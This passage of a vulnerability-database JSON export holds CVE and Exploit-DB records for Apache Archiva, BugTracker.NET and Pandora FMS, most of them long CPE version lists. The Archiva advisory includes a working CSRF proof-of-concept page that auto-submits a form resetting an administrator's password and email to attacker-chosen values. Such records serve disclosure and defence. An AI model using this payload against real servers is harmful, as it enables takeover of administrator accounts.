(GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----", "sourceHref": "https://www.exploit-db.com/download/15639", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-13T21:17:23", "description": "", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "exploitdb", "title": "Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2010-3449", "CVE-2010-3449"], "modified": "2010-12-09T00:00:00", "id": "EDB-ID:15710", "href": "https://www.exploit-db.com/exploits/15710", "sourceData": "ANATOLIA SECURITY ADVISORY\r\n--------------------------------------\r\n\r\n### ADVISORY INFO ###\r\n+ Title: Apache Archiva Cross-site Request Forgery Vulnerability\r\n+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt\r\n+ Advisory ID: 2010-001\r\n+ Versions: Archiva 1.0 to 1.3.1\r\n+ Date: 29/09/2010\r\n+ CVE-ID: CVE-2010-3449\r\n+ Vendor: The Apache Software Foundation\r\n+ Impact: Gaining Administrator Privileges\r\n+ CWE-ID: 352 \r\n+ Credit: Anatolia Security \r\n+ References: http://archiva.apache.org/security.html\r\n\r\n\r\n### VULNERABLE PRODUCT ###\r\n+ Apache Archiva: \"Apache Archiva is an extensible repository management software that helps taking care of your \r\nown personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as \r\nMaven, Continuum, and ANT. Archiva offers several capabilities, amongst which remote repository proxying, security \r\naccess management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning \r\nfunctionality... and many more!\"\r\n+ Homepage: http://archiva.apache.org\r\n\r\n\r\n\r\n### VULNERABILITY DETAILS ###\r\n+ Description: Apache Archiva affects from Cross-site Request Forgery. Application don't check which form sends\r\ncredentials. Technically, attacker can create a specially crafted page and force archiva administrators to view it \r\nand change their credentials. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha\r\nand asking old password for action like change password. Vulnerability patched by the Apache Archiva Team.\r\n\r\n+ Exploit/POC: http://www.anatoliasecurity.com/exploits/archiva-csrf-poc.txt\r\n\r\n\r\n<html>\r\n<head>\r\n<title> Apache Archiva CSRF PoC </title>\r\n</head>\r\n<body>\r\n<form id=\"userEditForm\" name=\"useredit\" action=\"http://archiva:8080/archiva/security/useredit.action\" method=\"post\">\r\n <input type=\"hidden\" name=\"user.username\" value=\"admin\" id=\"userEditForm_user_username\"/>\r\n <input type=\"hidden\" name=\"user.fullName\" value=\"OWNED0DAY\" id=\"userEditForm_user_fullName\"/>\r\n <input type=\"hidden\" name=\"user.email\" value=\"0day@zer0day.com\" id=\"userEditForm_user_email\"/>\r\n <input type=\"hidden\" name=\"user.password\" value=\"1337owned\" id=\"userEditForm_user_password\"/>\r\n <input type=\"hidden\" name=\"user.confirmPassword\" value=\"1337owned\" id=\"userEditForm_user_confirmPassword\"/>\r\n <input type=\"hidden\" name=\"user.locked\" value=\"true\" id=\"userEditForm_user_locked\"/>\r\n <input type=\"hidden\" name=\"__checkbox_user.locked\" value=\"true\" />\r\n <input type=\"hidden\" name=\"user.passwordChangeRequired\" value=\"true\" id=\"userEditForm_user_passwordChangeRequired\"/>\r\n <input type=\"hidden\" name=\"__checkbox_user.passwordChangeRequired\" value=\"true\" />\r\n <input type=\"hidden\" name=\"username\" value=\"admin\" id=\"userEditForm_username\"/>\r\n <input type=\"hidden\" id=\"userEditForm__submit\" name=\"method:submit\" value=\"Update\"/>\r\n</form>\r\n<script type=\"text/javascript\">\r\n document.forms[0].submit();\r\n</script>\r\n</body>\r\n</html>", "sourceHref": "https://www.exploit-db.com/download/15710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:27:36", "description": "Multiple SQL injection vulnerabilities in BugTracker.NET before 3.4.5 allow remote authenticated users to execute arbitrary SQL commands via (1) the qu_id parameter to bugs.aspx, (2) the row_id parameter to delete_query.aspx, the (3) new_project or (4) us_id parameter to edit_bug.aspx, or (5) the bug_list parameter to massedit.aspx. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2010-12-02T16:22:00", "type": "cve", "title": "CVE-2010-3267", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3267"], "modified": "2018-10-10T20:01:00", "cpe": ["cpe:/a:ifdefined:bugtracker.net:2.6.8", "cpe:/a:ifdefined:bugtracker.net:2.8.1", "cpe:/a:ifdefined:bugtracker.net:2.8.6", "cpe:/a:ifdefined:bugtracker.net:3.4.1", "cpe:/a:ifdefined:bugtracker.net:2.7.1", "cpe:/a:ifdefined:bugtracker.net:3.0.3", "cpe:/a:ifdefined:bugtracker.net:2.6.9", "cpe:/a:ifdefined:bugtracker.net:3.1.2", "cpe:/a:ifdefined:bugtracker.net:2.7.3", "cpe:/a:ifdefined:bugtracker.net:3.0.4", "cpe:/a:ifdefined:bugtracker.net:2.5.0", "cpe:/a:ifdefined:bugtracker.net:2.5.4", "cpe:/a:ifdefined:bugtracker.net:2.7.4", "cpe:/a:ifdefined:bugtracker.net:2.4.8", "cpe:/a:ifdefined:bugtracker.net:2.5.8", "cpe:/a:ifdefined:bugtracker.net:2.4.5", "cpe:/a:ifdefined:bugtracker.net:3.0.1", "cpe:/a:ifdefined:bugtracker.net:2.9.8", "cpe:/a:ifdefined:bugtracker.net:2.6.3", "cpe:/a:ifdefined:bugtracker.net:3.1.4", "cpe:/a:ifdefined:bugtracker.net:2.6.5", "cpe:/a:ifdefined:bugtracker.net:2.9.4", "cpe:/a:ifdefined:bugtracker.net:2.7.8", "cpe:/a:ifdefined:bugtracker.net:2.7.0", "cpe:/a:ifdefined:bugtracker.net:2.6.2", "cpe:/a:ifdefined:bugtracker.net:2.8.9", "cpe:/a:ifdefined:bugtracker.net:2.5.2", "cpe:/a:ifdefined:bugtracker.net:2.9.1", "cpe:/a:ifdefined:bugtracker.net:2.6.0", "cpe:/a:ifdefined:bugtracker.net:2.5.5", "cpe:/a:ifdefined:bugtracker.net:2.9.5", "cpe:/a:ifdefined:bugtracker.net:3.0.5", "cpe:/a:ifdefined:bugtracker.net:3.1.7", "cpe:/a:ifdefined:bugtracker.net:3.4.4", "cpe:/a:ifdefined:bugtracker.net:3.0.6", "cpe:/a:ifdefined:bugtracker.net:3.2.0", "cpe:/a:ifdefined:bugtracker.net:3.1.6", "cpe:/a:ifdefined:bugtracker.net:2.6.7", "cpe:/a:ifdefined:bugtracker.net:2.6.6", "cpe:/a:ifdefined:bugtracker.net:2.7.7", "cpe:/a:ifdefined:bugtracker.net:2.5.3", "cpe:/a:ifdefined:bugtracker.net:2.8.7", "cpe:/a:ifdefined:bugtracker.net:3.4.0", "cpe:/a:ifdefined:bugtracker.net:2.9.7", "cpe:/a:ifdefined:bugtracker.net:3.0.0", "cpe:/a:ifdefined:bugtracker.net:3.4.3", "cpe:/a:ifdefined:bugtracker.net:2.4.2", "cpe:/a:ifdefined:bugtracker.net:2.8.0", "cpe:/a:ifdefined:bugtracker.net:2.8.5", "cpe:/a:ifdefined:bugtracker.net:2.4.7", "cpe:/a:ifdefined:bugtracker.net:2.8.4", "cpe:/a:ifdefined:bugtracker.net:3.1.8", "cpe:/a:ifdefined:bugtracker.net:3.0.7", "cpe:/a:ifdefined:bugtracker.net:2.4.6", "cpe:/a:ifdefined:bugtracker.net:2.4.4", "cpe:/a:ifdefined:bugtracker.net:3.4.2", "cpe:/a:ifdefined:bugtracker.net:2.5.9", "cpe:/a:ifdefined:bugtracker.net:0.91", "cpe:/a:ifdefined:bugtracker.net:2.7.5", "cpe:/a:ifdefined:bugtracker.net:2.8.2", "cpe:/a:ifdefined:bugtracker.net:2.9.0", "cpe:/a:ifdefined:bugtracker.net:2.6.4", "cpe:/a:ifdefined:bugtracker.net:3.0.8", "cpe:/a:ifdefined:bugtracker.net:2.9.9", "cpe:/a:ifdefined:bugtracker.net:2.9.6", "cpe:/a:ifdefined:bugtracker.net:2.9.2", "cpe:/a:ifdefined:bugtracker.net:3.1.0", "cpe:/a:ifdefined:bugtracker.net:2.6.1", "cpe:/a:ifdefined:bugtracker.net:2.7.9", "cpe:/a:ifdefined:bugtracker.net:3.3.9", "cpe:/a:ifdefined:bugtracker.net:3.1.5", "cpe:/a:ifdefined:bugtracker.net:3.1.1", "cpe:/a:ifdefined:bugtracker.net:2.5.1", "cpe:/a:ifdefined:bugtracker.net:2.4.1", "cpe:/a:ifdefined:bugtracker.net:2.7.6", "cpe:/a:ifdefined:bugtracker.net:2.5.6", "cpe:/a:ifdefined:bugtracker.net:2.5.7", "cpe:/a:ifdefined:bugtracker.net:2.8.8", "cpe:/a:ifdefined:bugtracker.net:2.8.3", "cpe:/a:ifdefined:bugtracker.net:3.0.9", "cpe:/a:ifdefined:bugtracker.net:2.7.2", "cpe:/a:ifdefined:bugtracker.net:2.4.3", "cpe:/a:ifdefined:bugtracker.net:2.9.3", "cpe:/a:ifdefined:bugtracker.net:3.1.9", "cpe:/a:ifdefined:bugtracker.net:3.1.3"], "id": "CVE-2010-3267", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3267", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ifdefined:bugtracker.net:2.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.3.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:38", "description": "Incomplete blacklist vulnerability in the safe_url_extraclean function in ajax.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code by using a page parameter containing a UNC share pathname, which bypasses the check for the : (colon) character.", "cvss3": {}, "published": "2010-12-02T17:15:00", "type": "cve", "title": "CVE-2010-4281", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4281"], "modified": "2018-10-10T20:07:00", "cpe": ["cpe:/a:artica:pandora_fms:1.2", "cpe:/a:artica:pandora_fms:2.1.1", "cpe:/a:artica:pandora_fms:3.0", "cpe:/a:artica:pandora_fms:2.1", "cpe:/a:artica:pandora_fms:1.3.1", "cpe:/a:artica:pandora_fms:1.3", "cpe:/a:artica:pandora_fms:3.1", "cpe:/a:artica:pandora_fms:2.0"], "id": "CVE-2010-4281", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:artica:pandora_fms:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta3:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:27:36", "description": "Multiple cross-site scripting (XSS) vulnerabilities in BugTracker.NET before 3.4.5 allow remote authenticated users to inject arbitrary web script or HTML via (1) the pcd parameter to edit_bug.aspx, (2) the bug_id parameter to edit_comment.aspx, (3) the id parameter to edit_user_permissions2.aspx, or (4) the default_name parameter to edit_customfield.aspx. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2010-12-02T16:22:00", "type": "cve", "title": "CVE-2010-3266", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3266"], "modified": "2018-10-10T20:01:00", "cpe": ["cpe:/a:ifdefined:bugtracker.net:2.6.8", "cpe:/a:ifdefined:bugtracker.net:2.8.1", "cpe:/a:ifdefined:bugtracker.net:2.8.6", "cpe:/a:ifdefined:bugtracker.net:3.4.1", "cpe:/a:ifdefined:bugtracker.net:2.7.1", "cpe:/a:ifdefined:bugtracker.net:2.6.9", "cpe:/a:ifdefined:bugtracker.net:3.0.3", "cpe:/a:ifdefined:bugtracker.net:3.1.2", "cpe:/a:ifdefined:bugtracker.net:2.7.3", "cpe:/a:ifdefined:bugtracker.net:2.5.0", "cpe:/a:ifdefined:bugtracker.net:3.0.4", "cpe:/a:ifdefined:bugtracker.net:2.5.4", "cpe:/a:ifdefined:bugtracker.net:2.7.4", "cpe:/a:ifdefined:bugtracker.net:2.4.8", "cpe:/a:ifdefined:bugtracker.net:2.5.8", "cpe:/a:ifdefined:bugtracker.net:2.4.5", "cpe:/a:ifdefined:bugtracker.net:2.9.8", "cpe:/a:ifdefined:bugtracker.net:3.0.1", "cpe:/a:ifdefined:bugtracker.net:2.6.3", "cpe:/a:ifdefined:bugtracker.net:3.1.4", "cpe:/a:ifdefined:bugtracker.net:2.6.5", "cpe:/a:ifdefined:bugtracker.net:2.9.4", "cpe:/a:ifdefined:bugtracker.net:2.7.8", "cpe:/a:ifdefined:bugtracker.net:2.7.0", "cpe:/a:ifdefined:bugtracker.net:2.6.2", "cpe:/a:ifdefined:bugtracker.net:2.8.9", "cpe:/a:ifdefined:bugtracker.net:2.5.2", "cpe:/a:ifdefined:bugtracker.net:2.9.1", "cpe:/a:ifdefined:bugtracker.net:2.6.0", "cpe:/a:ifdefined:bugtracker.net:2.5.5", "cpe:/a:ifdefined:bugtracker.net:2.9.5", "cpe:/a:ifdefined:bugtracker.net:3.0.5", "cpe:/a:ifdefined:bugtracker.net:3.1.7", "cpe:/a:ifdefined:bugtracker.net:3.4.4", "cpe:/a:ifdefined:bugtracker.net:3.0.6", "cpe:/a:ifdefined:bugtracker.net:3.2.0", "cpe:/a:ifdefined:bugtracker.net:3.1.6", "cpe:/a:ifdefined:bugtracker.net:2.6.7", "cpe:/a:ifdefined:bugtracker.net:2.6.6", "cpe:/a:ifdefined:bugtracker.net:2.7.7", "cpe:/a:ifdefined:bugtracker.net:2.5.3", "cpe:/a:ifdefined:bugtracker.net:2.8.7", "cpe:/a:ifdefined:bugtracker.net:3.4.0", "cpe:/a:ifdefined:bugtracker.net:2.9.7", "cpe:/a:ifdefined:bugtracker.net:3.4.3", "cpe:/a:ifdefined:bugtracker.net:3.0.0", "cpe:/a:ifdefined:bugtracker.net:2.4.2", "cpe:/a:ifdefined:bugtracker.net:2.8.0", "cpe:/a:ifdefined:bugtracker.net:2.8.5", "cpe:/a:ifdefined:bugtracker.net:2.4.7", "cpe:/a:ifdefined:bugtracker.net:2.8.4", "cpe:/a:ifdefined:bugtracker.net:3.1.8", "cpe:/a:ifdefined:bugtracker.net:3.0.7", "cpe:/a:ifdefined:bugtracker.net:2.4.6", "cpe:/a:ifdefined:bugtracker.net:2.4.4", "cpe:/a:ifdefined:bugtracker.net:3.4.2", "cpe:/a:ifdefined:bugtracker.net:2.5.9", "cpe:/a:ifdefined:bugtracker.net:0.91", "cpe:/a:ifdefined:bugtracker.net:2.7.5", "cpe:/a:ifdefined:bugtracker.net:2.8.2", "cpe:/a:ifdefined:bugtracker.net:2.9.0", "cpe:/a:ifdefined:bugtracker.net:2.6.4", "cpe:/a:ifdefined:bugtracker.net:3.0.8", "cpe:/a:ifdefined:bugtracker.net:2.9.9", "cpe:/a:ifdefined:bugtracker.net:2.9.6", "cpe:/a:ifdefined:bugtracker.net:2.9.2", "cpe:/a:ifdefined:bugtracker.net:3.1.0", "cpe:/a:ifdefined:bugtracker.net:2.6.1", "cpe:/a:ifdefined:bugtracker.net:2.7.9", "cpe:/a:ifdefined:bugtracker.net:3.3.9", "cpe:/a:ifdefined:bugtracker.net:3.1.5", "cpe:/a:ifdefined:bugtracker.net:3.1.1", "cpe:/a:ifdefined:bugtracker.net:2.5.1", "cpe:/a:ifdefined:bugtracker.net:2.4.1", "cpe:/a:ifdefined:bugtracker.net:2.7.6", "cpe:/a:ifdefined:bugtracker.net:2.5.6", "cpe:/a:ifdefined:bugtracker.net:2.5.7", "cpe:/a:ifdefined:bugtracker.net:2.8.8", "cpe:/a:ifdefined:bugtracker.net:2.8.3", "cpe:/a:ifdefined:bugtracker.net:3.0.9", "cpe:/a:ifdefined:bugtracker.net:2.7.2", "cpe:/a:ifdefined:bugtracker.net:2.4.3", "cpe:/a:ifdefined:bugtracker.net:2.9.3", "cpe:/a:ifdefined:bugtracker.net:3.1.9", "cpe:/a:ifdefined:bugtracker.net:3.1.3"], "id": "CVE-2010-3266", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3266", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ifdefined:bugtracker.net:2.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.7:*:*:*:*:*:*:*", 